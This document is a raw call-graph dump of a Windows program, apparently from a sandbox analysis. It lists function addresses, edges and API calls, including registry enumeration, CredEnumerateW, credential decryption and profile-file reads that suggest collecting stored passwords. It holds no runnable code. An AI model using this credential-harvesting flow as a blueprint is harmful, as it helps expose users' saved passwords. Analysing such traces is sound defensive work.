34370 427430 45 API calls 34174 4090b0 7 API calls 34175 4148b0 15 API calls 34177 4118b4 RtlEnterCriticalSection 34178 4014b7 CreateWindowExA 34179 40c8b8 19 API calls 34181 4118bf RtlTryEnterCriticalSection 34375 42434a 18 API calls 34377 405f53 12 API calls 34189 43f956 59 API calls 34191 40955a 17 API calls 34192 428561 36 API calls 34193 409164 7 API calls 34381 404366 19 API calls 34385 40176c ExitProcess 34388 410777 42 API calls 34198 40dd7b 51 API calls 34199 425d7c 16 API calls 34390 43f6f0 25 API calls 34391 42db01 22 API calls 34200 412905 15 API calls 34392 403b04 54 API calls 34393 405f04 SetDlgItemTextA GetDlgItemTextA 34394 44b301 ??3@YAXPAX 34397 4120ea 14 API calls 34398 40bb0a 8 API calls 34400 413f11 strcmp 34204 434110 17 API calls 34207 425115 108 API calls 34401 444b11 _onexit 34209 425115 76 API calls 34212 429d19 10 API calls 34404 444b1f __dllonexit 34405 409f20 _strcmpi 34214 42b927 31 API calls 34408 433f26 19 API calls 34409 44b323 FreeLibrary 34410 427f25 46 API calls 34411 43ff2b 17 API calls 34412 43fb30 19 API calls 34221 414d36 16 API calls 34223 40ad38 7 API calls 34414 433b38 16 API calls 34094 44b33b 34095 44b344 ??3@YAXPAX 34094->34095 34096 44b34b 34094->34096 34095->34096 34097 44b354 ??3@YAXPAX 34096->34097 34098 44b35b 34096->34098 34097->34098 34099 44b364 ??3@YAXPAX 34098->34099 34100 44b36b 34098->34100 34099->34100 34101 44b374 ??3@YAXPAX 34100->34101 34102 44b37b 34100->34102 34101->34102 34227 426741 21 API calls 34228 40c5c3 125 API calls 34230 43fdc5 17 API calls 34415 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34233 4161cb memcpy memcpy memcpy memcpy 33173 44b3cf 33174 44b3e6 33173->33174 33179 44b454 33173->33179 33174->33179 33186 44b40e GetModuleHandleA 33174->33186 33176 44b45d GetModuleHandleA 33180 44b467 33176->33180 33177 44b49a 33199 44b49f 33177->33199 33179->33176 33179->33177 33179->33180 33180->33179 33181 44b487 GetProcAddress 33180->33181 33181->33179 33182 44b405 33182->33179 33182->33180 33183 44b428 GetProcAddress 33182->33183 33183->33179 33184 44b435 VirtualProtect 33183->33184 33184->33179 33185 44b444 VirtualProtect 33184->33185 33185->33179 33187 44b417 33186->33187 33189 44b454 33186->33189 33218 44b42b GetProcAddress 33187->33218 33191 44b45d GetModuleHandleA 33189->33191 33192 44b49a 33189->33192 33198 44b467 33189->33198 33190 44b41c 33190->33189 33194 44b428 GetProcAddress 33190->33194 33191->33198 33193 44b49f 776 API calls 33192->33193 33193->33192 33194->33189 33195 44b435 VirtualProtect 33194->33195 33195->33189 33196 44b444 VirtualProtect 33195->33196 33196->33189 33197 44b487 GetProcAddress 33197->33189 33198->33189 33198->33197 33200 444c4a 33199->33200 33201 444c56 GetModuleHandleA 33200->33201 33202 444c68 __set_app_type __p__fmode __p__commode 33201->33202 33204 444cfa 33202->33204 33205 444d02 __setusermatherr 33204->33205 33206 444d0e 33204->33206 33205->33206 33227 444e22 _controlfp 33206->33227 33208 444d13 _initterm __getmainargs _initterm 33209 444d6a GetStartupInfoA 33208->33209 33211 444d9e GetModuleHandleA 33209->33211 33228 40cf44 33211->33228 33215 444dcf _cexit 33217 444e04 33215->33217 33216 444dc8 exit 33216->33215 33217->33177 33219 44b454 33218->33219 33220 44b435 VirtualProtect 33218->33220 33222 44b45d GetModuleHandleA 33219->33222 33223 44b49a 33219->33223 33220->33219 33221 44b444 VirtualProtect 33220->33221 33221->33219 33226 44b467 33222->33226 33224 44b49f 776 API calls 33223->33224 33224->33223 33225 44b487 GetProcAddress 33225->33226 33226->33219 33226->33225 33227->33208 33279 404a99 LoadLibraryA 33228->33279 33230 40cf60 33267 40cf64 33230->33267 33287 410d0e 33230->33287 33232 40cf6f 33291 40ccd7 ??2@YAPAXI 33232->33291 33234 40cf9b 33305 407cbc 33234->33305 33239 40cfc4 33323 409825 memset 33239->33323 33240 40cfd8 33328 4096f4 memset 33240->33328 33245 40d181 ??3@YAXPAX 33247 40d1b3 33245->33247 33248 40d19f DeleteObject 33245->33248 33246 407e30 _strcmpi 33249 40cfee 33246->33249 33352 407948 free free 33247->33352 33248->33247 33251 40cff2 RegDeleteKeyA 33249->33251 33252 40d007 EnumResourceTypesA 33249->33252 33251->33245 33254 40d047 33252->33254 33255 40d02f MessageBoxA 33252->33255 33253 40d1c4 33353 4080d4 free 33253->33353 33256 40d0a0 CoInitialize 33254->33256 33333 40ce70 33254->33333 33255->33245 33350 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33350 33260 40d1cd 33354 407948 free free 33260->33354 33262 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33351 40c256 PostMessageA 33262->33351 33264 40d061 ??3@YAXPAX 33264->33247 33268 40d084 DeleteObject 33264->33268 33265 40d09e 33265->33256 33267->33215 33267->33216 33268->33247 33271 40d0f9 GetMessageA 33272 40d17b CoUninitialize 33271->33272 33273 40d10d 33271->33273 33272->33245 33274 40d113 TranslateAccelerator 33273->33274 33276 40d145 IsDialogMessage 33273->33276 33277 40d139 IsDialogMessage 33273->33277 33274->33273 33275 40d16d GetMessageA 33274->33275 33275->33272 33275->33274 33276->33275 33278 40d157 TranslateMessage DispatchMessageA 33276->33278 33277->33275 33277->33276 33278->33275 33280 404ac4 GetProcAddress 33279->33280 33281 404aec 33279->33281 33282 404ad4 33280->33282 33283 404add FreeLibrary 33280->33283 33285 404b13 33281->33285 33286 404afc MessageBoxA 33281->33286 33282->33283 33283->33281 33284 404ae8 33283->33284 33284->33281 33285->33230 33286->33230 33288 410d17 LoadLibraryA 33287->33288 33289 410d3c 33287->33289 33288->33289 33290 410d2b GetProcAddress 33288->33290 33289->33232 33290->33289 33292 40cd08 ??2@YAPAXI 33291->33292 33294 40cd26 33292->33294 33295 40cd2d 33292->33295 33362 404025 6 API calls 33294->33362 33297 40cd66 33295->33297 33298 40cd59 DeleteObject 33295->33298 33355 407088 33297->33355 33298->33297 33300 40cd6b 33358 4019b5 33300->33358 33303 4019b5 strncat 33304 40cdbf _mbscpy 33303->33304 33304->33234 33364 407948 free free 33305->33364 33307 407cf7 33310 407a1f malloc memcpy free free 33307->33310 33311 407ddc 33307->33311 33313 407d7a free 33307->33313 33318 407e04 33307->33318 33368 40796e 7 API calls 33307->33368 33369 406f30 33307->33369 33310->33307 33311->33318 33377 407a1f 33311->33377 33313->33307 33365 407a55 33318->33365 33319 407e30 33320 407e57 33319->33320 33321 407e38 33319->33321 33320->33239 33320->33240 33321->33320 33322 407e41 _strcmpi 33321->33322 33322->33320 33322->33321 33383 4097ff 33323->33383 33325 409854 33388 409731 33325->33388 33329 4097ff 3 API calls 33328->33329 33330 409723 33329->33330 33408 40966c 33330->33408 33422 4023b2 33333->33422 33338 40ced3 33511 40cdda 7 API calls 33338->33511 33339 40cece 33343 40cf3f 33339->33343 33463 40c3d0 memset GetModuleFileNameA strrchr 33339->33463 33343->33264 33343->33265 33346 40ceed 33490 40affa 33346->33490 33350->33262 33351->33271 33352->33253 33353->33260 33354->33267 33363 406fc7 memset _mbscpy 33355->33363 33357 40709f CreateFontIndirectA 33357->33300 33359 4019e1 33358->33359 33360 4019c2 strncat 33359->33360 33361 4019e5 memset LoadIconA 33359->33361 33360->33359 33361->33303 33362->33295 33363->33357 33364->33307 33366 407a65 33365->33366 33367 407a5b free 33365->33367 33366->33319 33367->33366 33368->33307 33370 406f37 malloc 33369->33370 33371 406f7d 33369->33371 33373 406f73 33370->33373 33374 406f58 33370->33374 33371->33307 33373->33307 33375 406f6c free 33374->33375 33376 406f5c memcpy 33374->33376 33375->33373 33376->33375 33378 407a38 33377->33378 33379 407a2d free 33377->33379 33381 406f30 3 API calls 33378->33381 33380 407a43 33379->33380 33382 40796e 7 API calls 33380->33382 33381->33380 33382->33318 33399 406f96 GetModuleFileNameA 33383->33399 33385 409805 strrchr 33386 409814 33385->33386 33387 409817 _mbscat 33385->33387 33386->33387 33387->33325 33400 44b090 33388->33400 33393 40930c 3 API calls 33394 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33393->33394 33395 4097c5 LoadStringA 33394->33395 33396 4097db 33395->33396 33396->33395 33398 4097f3 33396->33398 33407 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33396->33407 33398->33245 33399->33385 33401 40973e _mbscpy _mbscpy 33400->33401 33402 40930c 33401->33402 33403 44b090 33402->33403 33404 409319 memset GetPrivateProfileStringA 33403->33404 33405 409374 33404->33405 33406 409364 WritePrivateProfileStringA 33404->33406 33405->33393 33406->33405 33407->33396 33418 406f81 GetFileAttributesA 33408->33418 33410 409675 33411 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33410->33411 33417 4096ee 33410->33417 33419 409278 GetPrivateProfileStringA 33411->33419 33413 4096c9 33420 409278 GetPrivateProfileStringA 33413->33420 33415 4096da 33421 409278 GetPrivateProfileStringA 33415->33421 33417->33246 33418->33410 33419->33413 33420->33415 33421->33417 33513 409c1c 33422->33513 33425 401e69 memset 33552 410dbb 33425->33552 33428 401ec2 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33428->33582 33429 401ed4 33567 406f81 GetFileAttributesA 33429->33567 33432 401ee6 strlen strlen 33434 401f15 33432->33434 33435 401f28 33432->33435 33583 4070e3 strlen _mbscat _mbscpy _mbscat 33434->33583 33568 406f81 GetFileAttributesA 33435->33568 33438 401f35 33569 401c31 33438->33569 33441 401f75 33581 410a9c RegOpenKeyExA 33441->33581 33442 401c31 7 API calls 33442->33441 33444 401f91 33445 402187 33444->33445 33446 401f9c memset 33444->33446 33448 402195 ExpandEnvironmentStringsA 33445->33448 33449 4021a8 _strcmpi 33445->33449 33584 410b62 RegEnumKeyExA 33446->33584 33593 406f81 GetFileAttributesA 33448->33593 33449->33338 33449->33339 33451 40217e RegCloseKey 33451->33445 33452 401fd9 atoi 33453 401fef memset memset sprintf 33452->33453 33461 401fc9 33452->33461 33585 410b1e 33453->33585 33456 402165 33456->33451 33457 402076 memset memset strlen strlen 33457->33461 33458 4070e3 strlen _mbscat _mbscpy _mbscat 33458->33461 33459 4020dd strlen strlen 33459->33461 33460 406f81 GetFileAttributesA 33460->33461 33461->33451 33461->33452 33461->33456 33461->33457 33461->33458 33461->33459 33461->33460 33462 402167 _mbscpy 33461->33462 33592 410b62 RegEnumKeyExA 33461->33592 33462->33451 33464 40c422 33463->33464 33465 40c425 _mbscat _mbscpy _mbscpy 33463->33465 33464->33465 33466 40c49d 33465->33466 33467 40c512 33466->33467 33468 40c502 GetWindowPlacement 33466->33468 33469 40c538 33467->33469 33614 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33467->33614 33468->33467 33607 409b31 33469->33607 33473 40ba28 33474 40ba87 33473->33474 33480 40ba3c 33473->33480 33617 406c62 LoadCursorA SetCursor 33474->33617 33476 40ba8c 33618 410a9c RegOpenKeyExA 33476->33618 33619 404734 33476->33619 33627 4107f1 33476->33627 33630 404785 33476->33630 33633 403c16 33476->33633 33477 40ba43 _mbsicmp 33477->33480 33478 40baa0 33479 407e30 _strcmpi 33478->33479 33483 40bab0 33479->33483 33480->33474 33480->33477 33709 40b5e5 10 API calls 33480->33709 33481 40bafa SetCursor 33481->33346 33483->33481 33484 40baf1 qsort 33483->33484 33484->33481 34069 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33490->34069 33492 40b00e 33493 40b016 33492->33493 33494 40b01f GetStdHandle 33492->33494 34070 406d1a CreateFileA 33493->34070 33496 40b01c 33494->33496 33497 40b035 33496->33497 33498 40b12d 33496->33498 34071 406c62 LoadCursorA SetCursor 33497->34071 34075 406d77 9 API calls 33498->34075 33501 40b136 33512 40c580 28 API calls 33501->33512 33502 40b087 33509 40b0a1 33502->33509 34073 40a699 12 API calls 33502->34073 33503 40b042 33503->33502 33503->33509 34072 40a57c strlen WriteFile 33503->34072 33506 40b0d6 33507 40b116 CloseHandle 33506->33507 33508 40b11f SetCursor 33506->33508 33507->33508 33508->33501 33509->33506 34074 406d77 9 API calls 33509->34074 33511->33339 33512->33343 33525 409a32 33513->33525 33516 409c80 memcpy memcpy 33517 409cda 33516->33517 33517->33516 33518 409d18 ??2@YAPAXI ??2@YAPAXI 33517->33518 33519 408db6 12 API calls 33517->33519 33521 409d54 ??2@YAPAXI 33518->33521 33522 409d8b 33518->33522 33519->33517 33521->33522 33522->33522 33535 409b9c 33522->33535 33524 4023c1 33524->33425 33526 409a44 33525->33526 33527 409a3d ??3@YAXPAX 33525->33527 33528 409a52 33526->33528 33529 409a4b ??3@YAXPAX 33526->33529 33527->33526 33530 409a63 33528->33530 33531 409a5c ??3@YAXPAX 33528->33531 33529->33528 33532 409a83 ??2@YAPAXI ??2@YAPAXI 33530->33532 33533 409a73 ??3@YAXPAX 33530->33533 33534 409a7c ??3@YAXPAX 33530->33534 33531->33530 33532->33516 33533->33534 33534->33532 33536 407a55 free 33535->33536 33537 409ba5 33536->33537 33538 407a55 free 33537->33538 33539 409bad 33538->33539 33540 407a55 free 33539->33540 33541 409bb5 33540->33541 33542 407a55 free 33541->33542 33543 409bbd 33542->33543 33544 407a1f 4 API calls 33543->33544 33545 409bd0 33544->33545 33546 407a1f 4 API calls 33545->33546 33547 409bda 33546->33547 33548 407a1f 4 API calls 33547->33548 33549 409be4 33548->33549 33550 407a1f 4 API calls 33549->33550 33551 409bee 33550->33551 33551->33524 33553 410d0e 2 API calls 33552->33553 33554 410dca 33553->33554 33555 410dfd memset 33554->33555 33594 4070ae 33554->33594 33557 410e1d 33555->33557 33597 410a9c RegOpenKeyExA 33557->33597 33560 401e9e strlen strlen 33560->33428 33560->33429 33561 410e4a 33562 410e7f _mbscpy 33561->33562 33598 410d3d _mbscpy 33561->33598 33562->33560 33564 410e5b 33599 410add RegQueryValueExA 33564->33599 33566 410e73 RegCloseKey 33566->33562 33567->33432 33568->33438 33600 410a9c RegOpenKeyExA 33569->33600 33571 401c4c 33572 401cad 33571->33572 33601 410add RegQueryValueExA 33571->33601 33572->33441 33572->33442 33574 401c6a 33575 401c71 strchr 33574->33575 33576 401ca4 RegCloseKey 33574->33576 33575->33576 33577 401c85 strchr 33575->33577 33576->33572 33577->33576 33578 401c94 33577->33578 33602 406f06 strlen 33578->33602 33580 401ca1 33580->33576 33581->33444 33582->33429 33583->33435 33584->33461 33605 410a9c RegOpenKeyExA 33585->33605 33587 410b34 33588 410b5d 33587->33588 33606 410add RegQueryValueExA 33587->33606 33588->33461 33590 410b4c RegCloseKey 33590->33588 33592->33461 33593->33449 33595 4070bd GetVersionExA 33594->33595 33596 4070ce 33594->33596 33595->33596 33596->33555 33596->33560 33597->33561 33598->33564 33599->33566 33600->33571 33601->33574 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33580 33605->33587 33606->33590 33608 409b40 33607->33608 33610 409b4e 33607->33610 33615 409901 memset SendMessageA 33608->33615 33611 409b99 33610->33611 33612 409b8b 33610->33612 33611->33473 33616 409868 SendMessageA 33612->33616 33614->33469 33615->33610 33616->33611 33617->33476 33618->33478 33620 404785 FreeLibrary 33619->33620 33621 40473b LoadLibraryA 33620->33621 33622 40474c GetProcAddress 33621->33622 33623 40476e 33621->33623 33622->33623 33624 404764 33622->33624 33625 404781 33623->33625 33626 404785 FreeLibrary 33623->33626 33624->33623 33625->33478 33626->33625 33628 410807 33627->33628 33629 4107fc FreeLibrary 33627->33629 33628->33478 33629->33628 33631 4047a3 33630->33631 33632 404799 FreeLibrary 33630->33632 33631->33478 33632->33631 33634 4107f1 FreeLibrary 33633->33634 33635 403c30 LoadLibraryA 33634->33635 33636 403c74 33635->33636 33637 403c44 GetProcAddress 33635->33637 33639 4107f1 FreeLibrary 33636->33639 33637->33636 33638 403c5e 33637->33638 33638->33636 33642 403c6b 33638->33642 33640 403c7b 33639->33640 33641 404734 3 API calls 33640->33641 33643 403c86 33641->33643 33642->33640 33710 4036e5 33643->33710 33646 4036e5 27 API calls 33647 403c9a 33646->33647 33648 4036e5 27 API calls 33647->33648 33649 403ca4 33648->33649 33650 4036e5 27 API calls 33649->33650 33651 403cae 33650->33651 33722 4085d2 33651->33722 33659 403ce5 33660 403cf7 33659->33660 33905 402bd1 40 API calls 33659->33905 33770 410a9c RegOpenKeyExA 33660->33770 33663 403d0a 33664 403d1c 33663->33664 33906 402bd1 40 API calls 33663->33906 33771 402c5d 33664->33771 33668 4070ae GetVersionExA 33669 403d31 33668->33669 33789 410a9c RegOpenKeyExA 33669->33789 33671 403d51 33672 403d61 33671->33672 33907 402b22 47 API calls 33671->33907 33790 410a9c RegOpenKeyExA 33672->33790 33675 403d87 33676 403d97 33675->33676 33908 402b22 47 API calls 33675->33908 33791 410a9c RegOpenKeyExA 33676->33791 33679 403dbd 33680 403dcd 33679->33680 33909 402b22 47 API calls 33679->33909 33792 410808 33680->33792 33684 404785 FreeLibrary 33685 403de8 33684->33685 33796 402fdb 33685->33796 33688 402fdb 34 API calls 33689 403e00 33688->33689 33812 4032b7 33689->33812 33698 403e3b 33700 403e73 33698->33700 33701 403e46 _mbscpy 33698->33701 33859 40fb00 33700->33859 33911 40f334 334 API calls 33701->33911 33709->33480 33711 4036fb 33710->33711 33714 4037c5 33710->33714 33912 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33711->33912 33713 40370e 33713->33714 33715 403716 strchr 33713->33715 33714->33646 33715->33714 33716 403730 33715->33716 33913 4021b6 memset 33716->33913 33718 40373f _mbscpy _mbscpy strlen 33719 4037a4 _mbscpy 33718->33719 33720 403789 sprintf 33718->33720 33914 4023e5 16 API calls 33719->33914 33720->33719 33723 4085e2 33722->33723 33915 4082cd 11 API calls 33723->33915 33727 408600 33728 403cba 33727->33728 33729 40860b memset 33727->33729 33740 40821d 33728->33740 33918 410b62 RegEnumKeyExA 33729->33918 33731 408637 33732 4086d2 RegCloseKey 33731->33732 33734 40865c memset 33731->33734 33919 410a9c RegOpenKeyExA 33731->33919 33922 410b62 RegEnumKeyExA 33731->33922 33732->33728 33920 410add RegQueryValueExA 33734->33920 33737 408694 33921 40848b 10 API calls 33737->33921 33739 4086ab RegCloseKey 33739->33731 33923 410a9c RegOpenKeyExA 33740->33923 33742 40823f 33743 403cc6 33742->33743 33744 408246 memset 33742->33744 33752 4086e0 33743->33752 33924 410b62 RegEnumKeyExA 33744->33924 33746 4082bf RegCloseKey 33746->33743 33748 40826f 33748->33746 33925 410a9c RegOpenKeyExA 33748->33925 33926 4080ed 11 API calls 33748->33926 33927 410b62 RegEnumKeyExA 33748->33927 33751 4082a2 RegCloseKey 33751->33748 33928 4045db 33752->33928 33756 40872d 33758 408737 wcslen 33756->33758 33760 4088ef 33756->33760 33758->33760 33766 40876a 33758->33766 33759 40872b CredEnumerateW 33759->33756 33936 404656 33760->33936 33761 40877a wcsncmp 33761->33766 33763 404734 3 API calls 33763->33766 33764 404785 FreeLibrary 33764->33766 33765 408812 memset 33765->33766 33767 40883c memcpy wcschr 33765->33767 33766->33760 33766->33761 33766->33763 33766->33764 33766->33765 33766->33767 33768 4088c3 LocalFree 33766->33768 33939 40466b _mbscpy 33766->33939 33767->33766 33768->33766 33769 410a9c RegOpenKeyExA 33769->33659 33770->33663 33940 410a9c RegOpenKeyExA 33771->33940 33773 402c7a 33774 402da5 33773->33774 33775 402c87 memset 33773->33775 33774->33668 33941 410b62 RegEnumKeyExA 33775->33941 33777 402d9c RegCloseKey 33777->33774 33778 410b1e 3 API calls 33779 402ce4 memset sprintf 33778->33779 33942 410a9c RegOpenKeyExA 33779->33942 33781 402d28 33782 402d3a sprintf 33781->33782 33943 402bd1 40 API calls 33781->33943 33944 410a9c RegOpenKeyExA 33782->33944 33785 402cb2 33785->33777 33785->33778 33788 402d9a 33785->33788 33945 402bd1 40 API calls 33785->33945 33946 410b62 RegEnumKeyExA 33785->33946 33788->33777 33789->33671 33790->33675 33791->33679 33793 410816 33792->33793 33794 4107f1 FreeLibrary 33793->33794 33795 403ddd 33794->33795 33795->33684 33947 410a9c RegOpenKeyExA 33796->33947 33798 402ff9 33799 403006 memset 33798->33799 33800 40312c 33798->33800 33948 410b62 RegEnumKeyExA 33799->33948 33800->33688 33802 403122 RegCloseKey 33802->33800 33803 410b1e 3 API calls 33804 403058 memset sprintf 33803->33804 33949 410a9c RegOpenKeyExA 33804->33949 33806 403033 33806->33802 33806->33803 33807 4030a2 memset 33806->33807 33808 410b62 RegEnumKeyExA 33806->33808 33810 4030f9 RegCloseKey 33806->33810 33951 402db3 26 API calls 33806->33951 33950 410b62 RegEnumKeyExA 33807->33950 33808->33806 33810->33806 33813 4032d5 33812->33813 33814 4033a9 33812->33814 33952 4021b6 memset 33813->33952 33827 4034e4 memset memset 33814->33827 33816 4032e1 33953 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33816->33953 33818 4032ea 33819 4032f8 memset GetPrivateProfileSectionA 33818->33819 33954 4023e5 16 API calls 33818->33954 33819->33814 33824 40332f 33819->33824 33821 40339b strlen 33821->33814 33821->33824 33823 403350 strchr 33823->33824 33824->33814 33824->33821 33955 4021b6 memset 33824->33955 33956 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33824->33956 33957 4023e5 16 API calls 33824->33957 33828 410b1e 3 API calls 33827->33828 33829 40353f 33828->33829 33830 40357f 33829->33830 33831 403546 _mbscpy 33829->33831 33835 403985 33830->33835 33958 406d55 strlen _mbscat 33831->33958 33833 403565 _mbscat 33959 4033f0 19 API calls 33833->33959 33960 40466b _mbscpy 33835->33960 33839 4039aa 33840 4039ff 33839->33840 33961 40f460 memset memset 33839->33961 33982 40f6e2 33839->33982 33998 4038e8 21 API calls 33839->33998 33842 404785 FreeLibrary 33840->33842 33843 403a0b 33842->33843 33844 4037ca memset memset 33843->33844 34006 444551 memset 33844->34006 33847 4038e2 33847->33698 33910 40f334 334 API calls 33847->33910 33849 40382e 33850 406f06 2 API calls 33849->33850 33851 403843 33850->33851 33852 406f06 2 API calls 33851->33852 33853 403855 strchr 33852->33853 33854 403884 _mbscpy 33853->33854 33855 403897 strlen 33853->33855 33856 4038bf _mbscpy 33854->33856 33855->33856 33857 4038a4 sprintf 33855->33857 34018 4023e5 16 API calls 33856->34018 33857->33856 33860 44b090 33859->33860 33861 40fb10 RegOpenKeyExA 33860->33861 33862 403e7f 33861->33862 33863 40fb3b RegOpenKeyExA 33861->33863 33873 40f96c 33862->33873 33864 40fb55 RegQueryValueExA 33863->33864 33865 40fc2d RegCloseKey 33863->33865 33866 40fc23 RegCloseKey 33864->33866 33867 40fb84 33864->33867 33865->33862 33866->33865 33868 404734 3 API calls 33867->33868 33869 40fb91 33868->33869 33869->33866 33870 40fc19 LocalFree 33869->33870 33871 40fbdd memcpy memcpy 33869->33871 33870->33866 34023 40f802 11 API calls 33871->34023 33874 4070ae GetVersionExA 33873->33874 33875 40f98d 33874->33875 33876 4045db 7 API calls 33875->33876 33884 40f9a9 33876->33884 33877 40fae6 33878 404656 FreeLibrary 33877->33878 33879 403e85 33878->33879 33885 4442ea memset 33879->33885 33880 40fa13 memset WideCharToMultiByte 33881 40fa43 _strnicmp 33880->33881 33880->33884 33882 40fa5b WideCharToMultiByte 33881->33882 33881->33884 33883 40fa88 WideCharToMultiByte 33882->33883 33882->33884 33883->33884 33884->33877 33884->33880 33886 410dbb 9 API calls 33885->33886 33887 444329 33886->33887 34024 40759e strlen strlen 33887->34024 33892 410dbb 9 API calls 33893 444350 33892->33893 33894 40759e 3 API calls 33893->33894 33895 44435a 33894->33895 33896 444212 65 API calls 33895->33896 33897 444366 memset memset 33896->33897 33898 410b1e 3 API calls 33897->33898 33899 4443b9 ExpandEnvironmentStringsA strlen 33898->33899 33900 4443f4 _strcmpi 33899->33900 33901 4443e5 33899->33901 33902 403e91 33900->33902 33903 44440c 33900->33903 33901->33900 33902->33478 33904 444212 65 API calls 33903->33904 33904->33902 33905->33660 33906->33664 33907->33672 33908->33676 33909->33680 33910->33698 33911->33700 33912->33713 33913->33718 33914->33714 33916 40841c 33915->33916 33917 410a9c RegOpenKeyExA 33916->33917 33917->33727 33918->33731 33919->33731 33920->33737 33921->33739 33922->33731 33923->33742 33924->33748 33925->33748 33926->33751 33927->33748 33929 404656 FreeLibrary 33928->33929 33930 4045e3 LoadLibraryA 33929->33930 33931 404651 33930->33931 33932 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33930->33932 33931->33756 33931->33759 33931->33760 33933 40463d 33932->33933 33934 404643 33933->33934 33935 404656 FreeLibrary 33933->33935 33934->33931 33935->33931 33937 403cd2 33936->33937 33938 40465c FreeLibrary 33936->33938 33937->33769 33938->33937 33939->33766 33940->33773 33941->33785 33942->33781 33943->33782 33944->33785 33945->33785 33946->33785 33947->33798 33948->33806 33949->33806 33950->33806 33951->33806 33952->33816 33953->33818 33954->33819 33955->33823 33956->33824 33957->33824 33958->33833 33959->33830 33960->33839 33999 4078ba 33961->33999 33964 4078ba _mbsnbcat 33965 40f5a3 RegOpenKeyExA 33964->33965 33966 40f5c3 RegQueryValueExA 33965->33966 33967 40f6d9 33965->33967 33968 40f6d0 RegCloseKey 33966->33968 33969 40f5f0 33966->33969 33967->33839 33968->33967 33969->33968 33970 40f675 33969->33970 34003 40466b _mbscpy 33969->34003 33970->33968 34004 4012ee strlen 33970->34004 33972 40f611 33974 404734 3 API calls 33972->33974 33979 40f616 33974->33979 33975 40f69e RegQueryValueExA 33975->33968 33976 40f6c1 33975->33976 33976->33968 33977 40f66a 33978 404785 FreeLibrary 33977->33978 33978->33970 33979->33977 33980 40f661 LocalFree 33979->33980 33981 40f645 memcpy 33979->33981 33980->33977 33981->33980 34005 40466b _mbscpy 33982->34005 33984 40f6fa 33985 4045db 7 API calls 33984->33985 33986 40f708 33985->33986 33987 40f7e2 33986->33987 33988 404734 3 API calls 33986->33988 33989 404656 FreeLibrary 33987->33989 33993 40f715 33988->33993 33990 40f7f1 33989->33990 33991 404785 FreeLibrary 33990->33991 33992 40f7fc 33991->33992 33992->33839 33993->33987 33994 40f797 WideCharToMultiByte 33993->33994 33995 40f7b8 strlen 33994->33995 33996 40f7d9 LocalFree 33994->33996 33995->33996 33997 40f7c8 _mbscpy 33995->33997 33996->33987 33997->33996 33998->33839 34000 4078e6 33999->34000 34001 4078c7 _mbsnbcat 34000->34001 34002 4078ea 34000->34002 34001->34000 34002->33964 34003->33972 34004->33975 34005->33984 34019 410a9c RegOpenKeyExA 34006->34019 34008 44458b 34009 40381a 34008->34009 34020 410add RegQueryValueExA 34008->34020 34009->33847 34017 4021b6 memset 34009->34017 34011 4445dc RegCloseKey 34011->34009 34012 4445a4 34012->34011 34021 410add RegQueryValueExA 34012->34021 34014 4445c1 34014->34011 34022 444879 30 API calls 34014->34022 34016 4445da 34016->34011 34017->33849 34018->33847 34019->34008 34020->34012 34021->34014 34022->34016 34023->33870 34025 4075c9 34024->34025 34026 4075bb _mbscat 34024->34026 34027 444212 34025->34027 34026->34025 34044 407e9d 34027->34044 34030 44424d 34031 444274 34030->34031 34032 444258 34030->34032 34052 407ef8 34030->34052 34033 407e9d 9 API calls 34031->34033 34065 444196 52 API calls 34032->34065 34040 4442a0 34033->34040 34035 407ef8 9 API calls 34035->34040 34036 4442ce 34062 407f90 34036->34062 34040->34035 34040->34036 34042 444212 65 API calls 34040->34042 34066 407e62 strcmp strcmp 34040->34066 34041 407f90 FindClose 34043 4442e4 34041->34043 34042->34040 34043->33892 34045 407f90 FindClose 34044->34045 34046 407eaa 34045->34046 34047 406f06 2 API calls 34046->34047 34048 407ebd strlen strlen 34047->34048 34049 407ee1 34048->34049 34050 407eea 34048->34050 34067 4070e3 strlen _mbscat _mbscpy _mbscat 34049->34067 34050->34030 34053 407f03 FindFirstFileA 34052->34053 34054 407f24 FindNextFileA 34052->34054 34055 407f3f 34053->34055 34056 407f46 strlen strlen 34054->34056 34057 407f3a 34054->34057 34055->34056 34059 407f7f 34055->34059 34056->34059 34060 407f76 34056->34060 34058 407f90 FindClose 34057->34058 34058->34055 34059->34030 34068 4070e3 strlen _mbscat _mbscpy _mbscat 34060->34068 34063 407fa3 34062->34063 34064 407f99 FindClose 34062->34064 34063->34041 34064->34063 34065->34030 34066->34040 34067->34050 34068->34059 34069->33492 34070->33496 34071->33503 34072->33502 34073->33509 34074->33506 34075->33501 34420 43ffc8 18 API calls 34234 4281cc 15 API calls 34422 4383cc 110 API calls 34235 4275d3 41 API calls 34423 4153d3 22 API calls 34236 444dd7 _XcptFilter 34428 4013de 15 API calls 34430 425115 111 API calls 34431 43f7db 18 API calls 34434 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34238 4335ee 16 API calls 34436 429fef 11 API calls 34239 444deb _exit _c_exit 34437 40bbf0 138 API calls 34242 425115 79 API calls 34441 437ffa 22 API calls 34246 4021ff 14 API calls 34247 43f5fc 149 API calls 34442 40e381 9 API calls 34249 405983 40 API calls 34250 42b186 27 API calls 34251 427d86 76 API calls 34252 403585 20 API calls 34254 42e58e 18 API calls 34257 425115 75 API calls 34259 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34446 434395 16 API calls 34261 441d9c memcmp 34448 43f79b 119 API calls 34262 40c599 43 API calls 34449 426741 87 API calls 34266 4401a6 21 API calls 34268 426da6 memcpy memset memset memcpy 34269 4335a5 15 API calls 34271 4299ab memset memset memcpy memset memset 34272 40b1ab 8 API calls 34454 425115 76 API calls 34458 4113b2 18 API calls 34462 40a3b8 